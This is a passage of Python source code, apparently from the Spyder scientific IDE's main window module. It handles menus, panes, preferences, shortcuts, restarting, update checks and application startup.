self._update_show_toolbars_action() # --- Other def update_execution_state_kernel(self): """Handle execution state of the current console.""" try: self.ipyconsole.update_execution_state_kernel() except AttributeError: return def valid_project(self): """Handle an invalid active project.""" try: path = self.projects.get_active_project_path() except AttributeError: return if bool(path): if not self.projects.is_valid_project(path): if path: QMessageBox.critical( self, _('Error'), _("<b>{}</b> is no longer a valid Spyder project! " "Since it is the current active project, it will " "be closed automatically.").format(path)) self.projects.close_project() def free_memory(self): """Free memory after event.""" gc.collect() def plugin_focus_changed(self): """Focus has changed from one plugin to another""" self.update_edit_menu() self.update_search_menu() def show_shortcuts(self, menu): """Show action shortcuts in menu""" for element in getattr(self, menu + '_menu_actions'): if element and isinstance(element, QAction): if element._shown_shortcut is not None: element.setShortcut(element._shown_shortcut) def hide_shortcuts(self, menu): """Hide action shortcuts in menu""" for element in getattr(self, menu + '_menu_actions'): if element and isinstance(element, QAction): if element._shown_shortcut is not None: element.setShortcut(QKeySequence()) def get_focus_widget_properties(self): """Get properties of focus widget Returns tuple (widget, properties) where properties is a tuple of booleans: (is_console, not_readonly, readwrite_editor)""" from spyder.plugins.editor.widgets.editor import TextEditBaseWidget from spyder.plugins.ipythonconsole.widgets import ControlWidget widget = QApplication.focusWidget() textedit_properties = None if isinstance(widget, (TextEditBaseWidget, ControlWidget)): console = isinstance(widget, ControlWidget) not_readonly = not widget.isReadOnly() readwrite_editor = not_readonly and not console textedit_properties = (console, not_readonly, readwrite_editor) return widget, textedit_properties def update_edit_menu(self): """Update edit menu""" widget, textedit_properties = self.get_focus_widget_properties() if textedit_properties is None: # widget is not an editor/console return # !!! Below this line, widget is expected to be a QPlainTextEdit # instance console, not_readonly, readwrite_editor = textedit_properties # Editor has focus and there is no file opened in it if not console and not_readonly and not self.editor.is_file_opened(): return # Disabling all actions to begin with for child in self.edit_menu.actions(): child.setEnabled(False) self.selectall_action.setEnabled(True) # Undo, redo self.undo_action.setEnabled( readwrite_editor \ and widget.document().isUndoAvailable() ) self.redo_action.setEnabled( readwrite_editor \ and widget.document().isRedoAvailable() ) # Copy, cut, paste, delete has_selection = widget.has_selected_text() self.copy_action.setEnabled(has_selection) self.cut_action.setEnabled(has_selection and not_readonly) self.paste_action.setEnabled(not_readonly) # Comment, uncomment, indent, unindent... if not console and not_readonly: # This is the editor and current file is writable for action in self.editor.edit_menu_actions: action.setEnabled(True) def update_search_menu(self): """Update search menu""" # Disabling all actions except the last one # (which is Find in files) to begin with for child in self.search_menu.actions()[:-1]: child.setEnabled(False) widget, textedit_properties = self.get_focus_widget_properties() if textedit_properties is None: # widget is not an editor/console return # !!! Below this line, widget is expected to be a QPlainTextEdit # instance console, not_readonly, readwrite_editor = textedit_properties # Find actions only trigger an effect in the Editor if not console: for action in self.search_menu.actions(): try: action.setEnabled(True) except RuntimeError: pass # Disable the replace action for read-only files self.search_menu_actions[3].setEnabled(readwrite_editor) def create_plugins_menu(self): order = ['editor', 'ipython_console', 'variable_explorer', 'help', 'plots', None, 'explorer', 'outline_explorer', 'project_explorer', 'find_in_files', None, 'historylog', 'profiler', 'breakpoints', 'pylint', None, 'onlinehelp', 'internal_console', None] for plugin in self.widgetlist: action = plugin.toggle_view_action action.setChecked(plugin.dockwidget.isVisible()) try: name = plugin.CONF_SECTION pos = order.index(name) except ValueError: pos = None if pos is not None: order[pos] = action else: order.append(action) actions = order[:] for action in order: if type(action) is str: actions.remove(action) self.plugins_menu_actions = actions add_actions(self.plugins_menu, actions) def create_toolbars_menu(self): order = ['file_toolbar', 'run_toolbar', 'debug_toolbar', 'main_toolbar', 'Global working directory', None, 'search_toolbar', 'edit_toolbar', 'source_toolbar'] for toolbar in self.toolbarslist: action = toolbar.toggleViewAction() name = toolbar.objectName() try: pos = order.index(name) except ValueError: pos = None if pos is not None: order[pos] = action else: order.append(action) add_actions(self.toolbars_menu, order) def createPopupMenu(self): menu = QMenu('', self) actions = self.help_menu_actions[:3] + \ [None, self.help_menu_actions[-1]] add_actions(menu, actions) return menu def set_splash(self, message): """Set splash message""" if self.splash is None: return if message: logger.info(message) self.splash.show() self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute, QColor(Qt.white)) QApplication.processEvents() def closeEvent(self, event): """closeEvent reimplementation""" if self.closing(True): event.accept() else: event.ignore() def resizeEvent(self, event): """Reimplement Qt method""" if not self.isMaximized() and not self.fullscreen_flag: self.window_size = self.size() QMainWindow.resizeEvent(self, event) # To be used by the tour to be able to resize self.sig_resized.emit(event) def moveEvent(self, event): """Reimplement Qt method""" if not self.isMaximized() and not self.fullscreen_flag: self.window_position = self.pos() QMainWindow.moveEvent(self, event) # To be used by the tour to be able to move self.sig_moved.emit(event) def hideEvent(self, event): """Reimplement Qt method""" try: for plugin in (self.widgetlist + self.thirdparty_plugins): if plugin.isAncestorOf(self.last_focused_widget): plugin.visibility_changed(True) QMainWindow.hideEvent(self, event) except RuntimeError: QMainWindow.hideEvent(self, event) def change_last_focused_widget(self, old, now): """To keep track of to the last focused widget""" if (now is None and QApplication.activeWindow() is not None): QApplication.activeWindow().setFocus() self.last_focused_widget = QApplication.focusWidget() elif now is not None: self.last_focused_widget = now self.previous_focused_widget = old def closing(self, cancelable=False): """Exit tasks""" if self.already_closed or self.is_starting_up: return True if cancelable and CONF.get('main', 'prompt_on_exit'): reply = QMessageBox.critical(self, 'Spyder', 'Do you really want to exit?', QMessageBox.Yes, QMessageBox.No) if reply == QMessageBox.No: return False prefix = 'window' + '/' self.save_current_window_settings(prefix) if CONF.get('main', 'single_instance') and self.open_files_server: self.open_files_server.close() for plugin in (self.widgetlist + self.thirdparty_plugins): plugin.close_window() if not plugin.closing_plugin(cancelable): return False self.dialog_manager.close_all() if self.toolbars_visible: self.save_visible_toolbars() self.lspmanager.shutdown() self.already_closed = True return True def add_dockwidget(self, child): """Add QDockWidget and toggleViewAction""" dockwidget, location = child.create_dockwidget() if CONF.get('main', 'vertical_dockwidget_titlebars'): dockwidget.setFeatures(dockwidget.features()| QDockWidget.DockWidgetVerticalTitleBar) self.addDockWidget(location, dockwidget) self.widgetlist.append(child) @Slot() def close_current_dockwidget(self): widget = QApplication.focusWidget() for plugin in (self.widgetlist + self.thirdparty_plugins): if plugin.isAncestorOf(widget): plugin.toggle_view_action.setChecked(False) break def toggle_lock(self, value): """Lock/Unlock dockwidgets and toolbars""" self.interface_locked = value CONF.set('main', 'panes_locked', value) # Apply lock to panes for plugin in (self.widgetlist + self.thirdparty_plugins): if self.interface_locked: if plugin.dockwidget.isFloating(): plugin.dockwidget.setFloating(False) plugin.dockwidget.setTitleBarWidget(QWidget()) else: plugin.dockwidget.set_title_bar() # Apply lock to toolbars for toolbar in self.toolbarslist: if self.interface_locked: toolbar.setMovable(False) else: toolbar.setMovable(True) def __update_maximize_action(self): if self.state_before_maximizing is None: text = _("Maximize current pane") tip = _("Maximize current pane") icon = ima.icon('maximize') else: text = _("Restore current pane") tip = _("Restore pane to its original size") icon = ima.icon('unmaximize') self.maximize_action.setText(text) self.maximize_action.setIcon(icon) self.maximize_action.setToolTip(tip) @Slot() @Slot(bool) def maximize_dockwidget(self, restore=False): """Shortcut: Ctrl+Alt+Shift+M First call: maximize current dockwidget Second call (or restore=True): restore original window layout""" if self.state_before_maximizing is None: if restore: return # Select plugin to maximize self.state_before_maximizing = self.saveState() focus_widget = QApplication.focusWidget() for plugin in (self.widgetlist + self.thirdparty_plugins): plugin.dockwidget.hide() if plugin.isAncestorOf(focus_widget): self.last_plugin = plugin # Only plugins that have a dockwidget are part of widgetlist, # so last_plugin can be None after the above "for" cycle. # For example, this happens if, after Spyder has started, focus # is set to the Working directory toolbar (which doesn't have # a dockwidget) and then you press the Maximize button if self.last_plugin is None: # Using the Editor as default plugin to maximize self.last_plugin = self.editor # Maximize last_plugin self.last_plugin.dockwidget.toggleViewAction().setDisabled(True) self.setCentralWidget(self.last_plugin) self.last_plugin.ismaximized = True # Workaround to solve an issue with editor's outline explorer: # (otherwise the whole plugin is hidden and so is the outline explorer # and the latter won't be refreshed if not visible) self.last_plugin.show() self.last_plugin.visibility_changed(True) if self.last_plugin is self.editor: # Automatically show the outline if the editor was maximized: self.addDockWidget(Qt.RightDockWidgetArea, self.outlineexplorer.dockwidget) self.outlineexplorer.dockwidget.show() else: # Restore original layout (before maximizing current dockwidget) self.last_plugin.dockwidget.setWidget(self.last_plugin) self.last_plugin.dockwidget.toggleViewAction().setEnabled(True) self.setCentralWidget(None) self.last_plugin.ismaximized = False self.restoreState(self.state_before_maximizing) self.state_before_maximizing = None self.last_plugin.get_focus_widget().setFocus() self.__update_maximize_action() def __update_fullscreen_action(self): if self.fullscreen_flag: icon = ima.icon('window_nofullscreen') else: icon = ima.icon('window_fullscreen') if is_text_string(icon): icon = get_icon(icon) self.fullscreen_action.setIcon(icon) @Slot() def toggle_fullscreen(self): if self.fullscreen_flag: self.fullscreen_flag = False if os.name == 'nt': self.setWindowFlags( self.windowFlags() ^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)) self.setGeometry(self.saved_normal_geometry) self.showNormal() if self.maximized_flag: self.showMaximized() else: self.maximized_flag = self.isMaximized() self.fullscreen_flag = True self.saved_normal_geometry = self.normalGeometry() if os.name == 'nt': # Due to limitations of the Windows DWM, compositing is not # handled correctly for OpenGL based windows when going into # full screen mode, so we need to use this workaround. # See Issue #4291. self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint) screen_number = QDesktopWidget().screenNumber(self) if screen_number < 0: screen_number = 0 r = QApplication.desktop().screenGeometry(screen_number) self.setGeometry( r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2) self.showNormal() else: self.showFullScreen() self.__update_fullscreen_action() def add_to_toolbar(self, toolbar, widget): """Add widget actions to toolbar""" actions = widget.toolbar_actions if actions is not None: add_actions(toolbar, actions) @Slot() def about(self): """Create About Spyder dialog with general information.""" versions = get_versions() # Show Git revision for development version revlink = '' if versions['revision']: rev = versions['revision'] revlink = " (<a href='https://github.com/spyder-ide/spyder/"\ "commit/%s'>Commit: %s</a>)" % (rev, rev) msgBox = QMessageBox(self) msgBox.setText( """ <b>Spyder {spyder_ver}</b> {revision} <br>The Scientific Python Development Environment | <a href="{website_url}">Spyder-IDE.org</a> <br>Copyright &copy; 2009-2019 Spyder Project Contributors and <a href="{github_url}/blob/master/AUTHORS.txt">others</a> <br>Distributed under the terms of the <a href="{github_url}/blob/master/LICENSE.txt">MIT License</a>. <p>Created by Pierre Raybaut; current maintainer is Carlos Cordoba. <br>Developed by the <a href="{github_url}/graphs/contributors">international Spyder community</a>. <br>Many thanks to all the Spyder beta testers and dedicated users. <p>For help with Spyder errors and crashes, please read our <a href="{trouble_url}">Troubleshooting Guide</a>, and for bug reports and feature requests, visit our <a href="{github_url}">Github site</a>. For project discussion, see our <a href="{forum_url}">Google Group</a>. <p>This project is part of a larger effort to promote and facilitate the use of Python for scientific and engineering software development. The popular Python distributions <a href="https://www.anaconda.com/download/">Anaconda</a> and <a href="https://winpython.github.io/">WinPython</a> also contribute to this plan. <p>Python {python_ver} {bitness}-bit | Qt {qt_ver} | {qt_api} {qt_api_ver} | {os_name} {os_ver} <small><p>Certain source files under other compatible permissive licenses and/or originally by other authors. Spyder 3 theme icons derived from <a href="https://fontawesome.com/">Font Awesome</a> 4.7 (&copy; 2016 David Gandy; SIL OFL 1.1) and <a href="http://materialdesignicons.com/">Material Design</a> (&copy; 2014 Austin Andrews; SIL OFL 1.1). Most Spyder 2 theme icons sourced from the <a href="https://www.everaldo.com">Crystal Project iconset</a> (&copy; 2006-2007 Everaldo Coelho; LGPL 2.1+). Other icons from <a href="http://p.yusukekamiyamane.com/">Yusuke Kamiyamane</a> (&copy; 2013 Yusuke Kamiyamane; CC-BY 3.0), the <a href="http://www.famfamfam.com/lab/icons/silk/">FamFamFam Silk icon set</a> 1.3 (&copy; 2006 Mark James; CC-BY 2.5), and the <a href="https://www.kde.org/">KDE Oxygen icons</a> (&copy; 2007 KDE Artists; LGPL 3.0+).</small> <p>See the <a href="{github_url}/blob/master/NOTICE.txt">NOTICE</a> file for full legal information. """ .format(spyder_ver=versions['spyder'], revision=revlink, website_url=__website_url__, github_url=__project_url__, trouble_url=__trouble_url__, forum_url=__forum_url__, python_ver=versions['python'], bitness=versions['bitness'], qt_ver=versions['qt'], qt_api=versions['qt_api'], qt_api_ver=versions['qt_api_ver'], os_name=versions['system'], os_ver=versions['release']) ) msgBox.setWindowTitle(_("About %s") % "Spyder") msgBox.setStandardButtons(QMessageBox.Ok) from spyder.config.gui import is_dark_interface if PYQT5: if is_dark_interface(): icon_filename = "spyder.svg" else: icon_filename = "spyder_dark.svg" else: if is_dark_interface(): icon_filename = "spyder.png" else: icon_filename = "spyder_dark.png" app_icon = QIcon(get_image_path(icon_filename)) msgBox.setIconPixmap(app_icon.pixmap(QSize(64, 64))) msgBox.setTextInteractionFlags( Qt.LinksAccessibleByMouse | Qt.TextSelectableByMouse) msgBox.exec_() @Slot() def show_dependencies(self): """Show Spyder's Dependencies dialog box""" from spyder.widgets.dependencies import DependenciesDialog dlg = DependenciesDialog(self) dlg.set_data(dependencies.DEPENDENCIES) dlg.exec_() def render_issue(self, description='', traceback=''): """Render issue before sending it to Github""" # Get component versions versions = get_versions() # Get git revision for development version revision = '' if versions['revision']: revision = versions['revision'] # Make a description header in case no description is supplied if not description: description = "### What steps reproduce the problem?" # Make error section from traceback and add appropriate reminder header if traceback: error_section = ("### Traceback\n" "```python-traceback\n" "{}\n" "```".format(traceback)) else: error_section = '' issue_template = """\ ## Description {description} {error_section} ## Versions * Spyder version: {spyder_version} {commit} * Python version: {python_version} * Qt version: {qt_version} * {qt_api_name} version: {qt_api_version} * Operating System: {os_name} {os_version} ### Dependencies ``` {dependencies} ``` """.format(description=description, error_section=error_section, spyder_version=versions['spyder'], commit=revision, python_version=versions['python'], qt_version=versions['qt'], qt_api_name=versions['qt_api'], qt_api_version=versions['qt_api_ver'], os_name=versions['system'], os_version=versions['release'], dependencies=dependencies.status()) return issue_template @Slot() def report_issue(self, body=None, title=None, open_webpage=False): """Report a Spyder issue to github, generating body text if needed.""" if body is None: from spyder.widgets.reporterror import SpyderErrorDialog report_dlg = SpyderErrorDialog(self, is_report=True) report_dlg.show() else: if open_webpage: if PY3: from urllib.parse import quote else: from urllib import quote # analysis:ignore from qtpy.QtCore import QUrlQuery url = QUrl(__project_url__ + '/issues/new') query = QUrlQuery() query.addQueryItem("body", quote(body)) if title: query.addQueryItem("title", quote(title)) url.setQuery(query) QDesktopServices.openUrl(url) @Slot() def trouble_guide(self): """Open Spyder troubleshooting guide in a web browser.""" url = QUrl(__trouble_url__) QDesktopServices.openUrl(url) @Slot() def google_group(self): """Open Spyder Google Group in a web browser.""" url = QUrl(__forum_url__) QDesktopServices.openUrl(url) @Slot() def global_callback(self): """Global callback""" widget = QApplication.focusWidget() action = self.sender() callback = from_qvariant(action.data(), to_text_string) from spyder.plugins.editor.widgets.editor import TextEditBaseWidget from spyder.plugins.ipythonconsole.widgets import ControlWidget if isinstance(widget, (TextEditBaseWidget, ControlWidget)): getattr(widget, callback)() else: return def redirect_internalshell_stdio(self, state): if state: self.console.shell.interpreter.redirect_stds() else: self.console.shell.interpreter.restore_stds() def open_external_console(self, fname, wdir, args, interact, debug, python, python_args, systerm, post_mortem=False): """Open external console""" if systerm: # Running script in an external system terminal try: if CONF.get('main_interpreter', 'default'): executable = get_python_executable() else: executable = CONF.get('main_interpreter', 'executable') programs.run_python_script_in_terminal( fname, wdir, args, interact, debug, python_args, executable) except NotImplementedError: QMessageBox.critical(self, _("Run"), _("Running an external system terminal " "is not supported on platform %s." ) % os.name) def execute_in_external_console(self, lines, focus_to_editor): """ Execute lines in IPython console and eventually set focus to the Editor. """ console = self.ipyconsole console.switch_to_plugin() console.execute_code(lines) if focus_to_editor: self.editor.switch_to_plugin() def open_file(self, fname, external=False): """ Open filename with the appropriate application Redirect to the right widget (txt -> editor, spydata -> workspace, ...) or open file outside Spyder (if extension is not supported) """ fname = to_text_string(fname) ext = osp.splitext(fname)[1] if encoding.is_text_file(fname): self.editor.load(fname) elif self.variableexplorer is not None and ext in IMPORT_EXT: self.variableexplorer.import_data(fname) elif not external: fname = file_uri(fname) programs.start_file(fname) def open_external_file(self, fname): """ Open external files that can be handled either by the Editor or the variable explorer inside Spyder. """ fname = encoding.to_unicode_from_fs(fname) if osp.isfile(fname): self.open_file(fname, external=True) elif osp.isfile(osp.join(CWD, fname)): self.open_file(osp.join(CWD, fname), external=True) # ---- PYTHONPATH management, etc. def get_spyder_pythonpath(self): """Return Spyder PYTHONPATH""" active_path = [p for p in self.path if p not in self.not_active_path] return active_path + self.project_path def add_path_to_sys_path(self): """Add Spyder path to sys.path""" for path in reversed(self.get_spyder_pythonpath()): sys.path.insert(1, path) def remove_path_from_sys_path(self): """Remove Spyder path from sys.path""" for path in self.path + self.project_path: while path in sys.path: sys.path.remove(path) @Slot() def path_manager_callback(self): """Spyder path manager""" from spyder.widgets.pathmanager import PathManager self.remove_path_from_sys_path() project_path = self.projects.get_pythonpath() dialog = PathManager(self, self.path, project_path, self.not_active_path, sync=True) dialog.redirect_stdio.connect(self.redirect_internalshell_stdio) dialog.exec_() self.add_path_to_sys_path() try: encoding.writelines(self.path, self.SPYDER_PATH) # Saving path encoding.writelines(self.not_active_path, self.SPYDER_NOT_ACTIVE_PATH) except EnvironmentError: pass self.sig_pythonpath_changed.emit() def pythonpath_changed(self): """Projects PYTHONPATH contribution has changed""" self.remove_path_from_sys_path() self.project_path = self.projects.get_pythonpath() self.add_path_to_sys_path() self.sig_pythonpath_changed.emit() @Slot() def win_env(self): """Show Windows current user environment variables""" self.dialog_manager.show(WinUserEnvDialog(self)) #---- Preferences def apply_settings(self): """Apply settings changed in 'Preferences' dialog box""" qapp = QApplication.instance() # Set 'gtk+' as the default theme in Gtk-based desktops # Fixes Issue 2036 if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()): try: qapp.setStyle('gtk+') except: pass else: style_name = CONF.get('appearance', 'windows_style', self.default_style) style = QStyleFactory.create(style_name) if style is not None: style.setProperty('name', style_name) qapp.setStyle(style) default = self.DOCKOPTIONS if CONF.get('main', 'vertical_tabs'): default = default|QMainWindow.VerticalTabs if CONF.get('main', 'animated_docks'): default = default|QMainWindow.AnimatedDocks self.setDockOptions(default) self.apply_panes_settings() self.apply_statusbar_settings() if CONF.get('main', 'use_custom_cursor_blinking'): qapp.setCursorFlashTime(CONF.get('main', 'custom_cursor_blinking')) else: qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT) def apply_panes_settings(self): """Update dockwidgets features settings""" for plugin in (self.widgetlist + self.thirdparty_plugins): features = plugin.FEATURES if CONF.get('main', 'vertical_dockwidget_titlebars'): features = features | QDockWidget.DockWidgetVerticalTitleBar plugin.dockwidget.setFeatures(features) plugin.update_margins() def apply_statusbar_settings(self): """Update status bar widgets settings""" show_status_bar = CONF.get('main', 'show_status_bar') self.statusBar().setVisible(show_status_bar) if show_status_bar: for widget, name in ((self.mem_status, 'memory_usage'), (self.cpu_status, 'cpu_usage')): if widget is not None: widget.setVisible(CONF.get('main', '%s/enable' % name)) widget.set_interval(CONF.get('main', '%s/timeout' % name)) else: return @Slot() def edit_preferences(self): """Edit Spyder preferences""" from spyder.preferences.configdialog import ConfigDialog dlg = ConfigDialog(self) dlg.size_change.connect(self.set_prefs_size) if self.prefs_dialog_size is not None: dlg.resize(self.prefs_dialog_size) for PrefPageClass in self.general_prefs: widget = PrefPageClass(dlg, main=self) widget.initialize() dlg.add_page(widget) for plugin in [self.workingdirectory, self.editor, self.projects, self.ipyconsole, self.historylog, self.help, self.variableexplorer, self.onlinehelp, self.explorer, self.findinfiles ]+self.thirdparty_plugins: if plugin is not None: try: widget = plugin.create_configwidget(dlg) if widget is not None: dlg.add_page(widget) except Exception: traceback.print_exc(file=sys.stderr) if self.prefs_index is not None: dlg.set_current_index(self.prefs_index) dlg.show() dlg.check_all_settings() dlg.pages_widget.currentChanged.connect(self.__preference_page_changed) dlg.exec_() def __preference_page_changed(self, index): """Preference page index has changed""" self.prefs_index = index def set_prefs_size(self, size): """Save preferences dialog size""" self.prefs_dialog_size = size #---- Shortcuts def register_shortcut(self, qaction_or_qshortcut, context, name, add_sc_to_tip=False): """ Register QAction or QShortcut to Spyder main application, with shortcut (context, name, default) """ self.shortcut_data.append( (qaction_or_qshortcut, context, name, add_sc_to_tip) ) def apply_shortcuts(self): """Apply shortcuts settings to all widgets/plugins""" toberemoved = [] for index, (qobject, context, name, add_sc_to_tip) in enumerate(self.shortcut_data): keyseq = QKeySequence( get_shortcut(context, name) ) try: if isinstance(qobject, QAction): if sys.platform == 'darwin' and \ qobject._shown_shortcut == 'missing': qobject._shown_shortcut = keyseq else: qobject.setShortcut(keyseq) if add_sc_to_tip: add_shortcut_to_tooltip(qobject, context, name) elif isinstance(qobject, QShortcut): qobject.setKey(keyseq) except RuntimeError: # Object has been deleted toberemoved.append(index) for index in sorted(toberemoved, reverse=True): self.shortcut_data.pop(index) @Slot() def show_shortcuts_dialog(self): from spyder.widgets.shortcutssummary import ShortcutsSummaryDialog dlg = ShortcutsSummaryDialog(None) dlg.exec_() # -- Open files server def start_open_files_server(self): self.open_files_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) port = select_port(default_port=OPEN_FILES_PORT) CONF.set('main', 'open_files_port', port) self.open_files_server.bind(('127.0.0.1', port)) self.open_files_server.listen(20) while 1: # 1 is faster than True try: req, dummy = self.open_files_server.accept() except socket.error as e: # See Issue 1275 for details on why errno EINTR is # silently ignored here. eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR # To avoid a traceback after closing on Windows if e.args[0] == eintr: continue # handle a connection abort on close error enotsock = (errno.WSAENOTSOCK if os.name == 'nt' else errno.ENOTSOCK) if e.args[0] in [errno.ECONNABORTED, enotsock]: return raise fname = req.recv(1024) fname = fname.decode('utf-8') self.sig_open_external_file.emit(fname) req.sendall(b' ') # ---- Quit and restart, and reset spyder defaults @Slot() def reset_spyder(self): """ Quit and reset Spyder and then Restart application. """ answer = QMessageBox.warning(self, _("Warning"), _("Spyder will restart and reset to default settings: <br><br>" "Do you want to continue?"), QMessageBox.Yes | QMessageBox.No) if answer == QMessageBox.Yes: self.restart(reset=True) @Slot() def restart(self, reset=False): """ Quit and Restart Spyder application. If reset True it allows to reset spyder on restart. """ # Get start path to use in restart script spyder_start_directory = get_module_path('spyder') restart_script = osp.join(spyder_start_directory, 'app', 'restart.py') # Get any initial argument passed when spyder was started # Note: Variables defined in bootstrap.py and spyder/app/start.py env = os.environ.copy() bootstrap_args = env.pop('SPYDER_BOOTSTRAP_ARGS', None) spyder_args = env.pop('SPYDER_ARGS') # Get current process and python running spyder pid = os.getpid() python = sys.executable # Check if started with bootstrap.py if bootstrap_args is not None: spyder_args = bootstrap_args is_bootstrap = True else: is_bootstrap = False # Pass variables as environment variables (str) to restarter subprocess env['SPYDER_ARGS'] = spyder_args env['SPYDER_PID'] = str(pid) env['SPYDER_IS_BOOTSTRAP'] = str(is_bootstrap) env['SPYDER_RESET'] = str(reset) if DEV: if os.name == 'nt': env['PYTHONPATH'] = ';'.join(sys.path) else: env['PYTHONPATH'] = ':'.join(sys.path) # Build the command and popen arguments depending on the OS if os.name == 'nt': # Hide flashing command prompt startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW shell = False else: startupinfo = None shell = True command = '"{0}" "{1}"' command = command.format(python, restart_script) try: if self.closing(True): subprocess.Popen(command, shell=shell, env=env, startupinfo=startupinfo) self.console.quit() except Exception as error: # If there is an error with subprocess, Spyder should not quit and # the error can be inspected in the internal console print(error) # spyder: test-skip print(command) # spyder: test-skip # ---- Interactive Tours def show_tour(self, index): """Show interactive tour.""" self.maximize_dockwidget(restore=True) frames = self.tours_available[index] self.tour.set_tour(index, frames, self) self.tour.start_tour() # ---- Global File Switcher def open_fileswitcher(self, symbol=False): """Open file list management dialog box.""" if self.fileswitcher is not None and \ self.fileswitcher.is_visible: self.fileswitcher.hide() self.fileswitcher.is_visible = False return if symbol: self.fileswitcher.plugin = self.editor self.fileswitcher.set_search_text('@') else: self.fileswitcher.set_search_text('') self.fileswitcher.show() self.fileswitcher.is_visible = True def open_symbolfinder(self): """Open symbol list management dialog box.""" self.open_fileswitcher(symbol=True) def add_to_fileswitcher(self, plugin, tabs, data, icon): """Add a plugin to the File Switcher.""" if self.fileswitcher is None: self.fileswitcher = FileSwitcher(self, plugin, tabs, data, icon) else: self.fileswitcher.add_plugin(plugin, tabs, data, icon) self.fileswitcher.sig_goto_file.connect( plugin.get_current_tab_manager().set_stack_index) # ---- Check for Spyder Updates def _check_updates_ready(self): """Called by WorkerUpdates when ready""" from spyder.widgets.helperwidgets import MessageCheckBox # feedback` = False is used on startup, so only positive feedback is # given. `feedback` = True is used when after startup (when using the # menu action, and gives feeback if updates are, or are not found. feedback = self.give_updates_feedback # Get results from worker update_available = self.worker_updates.update_available latest_release = self.worker_updates.latest_release error_msg = self.worker_updates.error url_r = __project_url__ + '/releases' url_i = 'https://docs.spyder-ide.org/installation.html' # Define the custom QMessageBox box = MessageCheckBox(icon=QMessageBox.Information, parent=self) box.setWindowTitle(_("Spyder updates")) box.set_checkbox_text(_("Check for updates on startup")) box.setStandardButtons(QMessageBox.Ok) box.setDefaultButton(QMessageBox.Ok) # Adjust the checkbox depending on the stored configuration section, option = 'main', 'check_updates_on_startup' check_updates = CONF.get(section, option) box.set_checked(check_updates) if error_msg is not None: msg = error_msg box.setText(msg) box.set_check_visible(False) box.exec_() check_updates = box.is_checked() else: if update_available: anaconda_msg = '' if 'Anaconda' in sys.version or 'conda-forge' in sys.version: anaconda_msg = _("<hr><b>IMPORTANT NOTE:</b> It seems " "that you are using Spyder with " "<b>Anaconda/Miniconda</b>. Please " "<b>don't</b> use <code>pip</code> to " "update it as that will probably break " "your installation.<br><br>" "Instead, please wait until new conda " "packages are available and use " "<code>conda</code> to perform the " "update.<hr>") msg = _("<b>Spyder %s is available!</b> <br><br>Please use " "your package manager to update Spyder or go to our " "<a href=\"%s\">Releases</a> page to download this " "new version. <br><br>If you are not sure how to " "proceed to update Spyder please refer to our " " <a href=\"%s\">Installation</a> instructions." "") % (latest_release, url_r, url_i) msg += '<br>' + anaconda_msg box.setText(msg) box.set_check_visible(True) box.exec_() check_updates = box.is_checked() elif feedback: msg = _("Spyder is up to date.") box.setText(msg) box.set_check_visible(False) box.exec_() check_updates = box.is_checked() # Update checkbox based on user interaction CONF.set(section, option, check_updates) # Enable check_updates_action after the thread has finished self.check_updates_action.setDisabled(False) # Provide feeback when clicking menu if check on startup is on self.give_updates_feedback = True @Slot() def check_updates(self, startup=False): """ Check for spyder updates on github releases using a QThread. """ from spyder.workers.updates import WorkerUpdates # Disable check_updates_action while the thread is working self.check_updates_action.setDisabled(True) if self.thread_updates is not None: self.thread_updates.terminate() self.thread_updates = QThread(self) self.worker_updates = WorkerUpdates(self, startup=startup) self.worker_updates.sig_ready.connect(self._check_updates_ready) self.worker_updates.sig_ready.connect(self.thread_updates.quit) self.worker_updates.moveToThread(self.thread_updates) self.thread_updates.started.connect(self.worker_updates.start) self.thread_updates.start() # --- For OpenGL def _test_setting_opengl(self, option): """Get the current OpenGL implementation in use""" if option == 'software': return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL) elif option == 'desktop': return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL) elif option == 'gles': return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES) #============================================================================== # Utilities to create the 'main' function #============================================================================== def initialize(): """Initialize Qt, patching sys.exit and eventually setting up ETS""" # This doesn't create our QApplication, just holds a reference to # MAIN_APP, created above to show our splash screen as early as # possible app = qapplication() # --- Set application icon app.setWindowIcon(APP_ICON) #----Monkey patching QApplication class FakeQApplication(QApplication): """Spyder's fake QApplication""" def __init__(self, args): self = app # analysis:ignore @staticmethod def exec_(): """Do nothing because the Qt mainloop is already running""" pass from qtpy import QtWidgets QtWidgets.QApplication = FakeQApplication # ----Monkey patching sys.exit def fake_sys_exit(arg=[]): pass sys.exit = fake_sys_exit # ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+ if PYQT5: def spy_excepthook(type_, value, tback): sys.__excepthook__(type_, value, tback) sys.excepthook = spy_excepthook # Removing arguments from sys.argv as in standard Python interpreter sys.argv = [''] # Selecting Qt4 backend for Enthought Tool Suite (if installed) try: from enthought.etsconfig.api import ETSConfig ETSConfig.toolkit = 'qt4' except ImportError: pass return app class Spy(object): """ Inspect Spyder internals Attributes: app Reference to main QApplication object window Reference to spyder.MainWindow widget """ def __init__(self, app, window): self.app = app self.window = window def __dir__(self): return list(self.__dict__.keys()) +\ [x for x in dir(self.__class__) if x[0] != '_'] def versions(self): return get_versions() def run_spyder(app, options, args): """ Create and show Spyder's main window Start QApplication event loop """ #TODO: insert here # Main window main = MainWindow(options) try: main.setup() except BaseException: if main.console is not None: try: main.console.shell.exit_interpreter() except BaseException: pass raise main.show() main.post_visible_setup() if main.console: main.console.shell.interpreter.namespace['spy'] = \ Spy(app=app, window=main) # Open external files passed as args if args: for a in args: main.open_external_file(a) # Don't show icons in menus for Mac if sys.platform == 'darwin': QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True) # Open external files with our Mac app if running_in_mac_app(): app.sig_open_external_file.connect(main.open_external_file) # To give focus again to the last focused widget after restoring # the window app.focusChanged.connect(main.change_last_focused_widget) if not running_under_pytest(): app.exec_() return main #============================================================================== # Main #============================================================================== def main(): """Main function""" # **** For Pytest 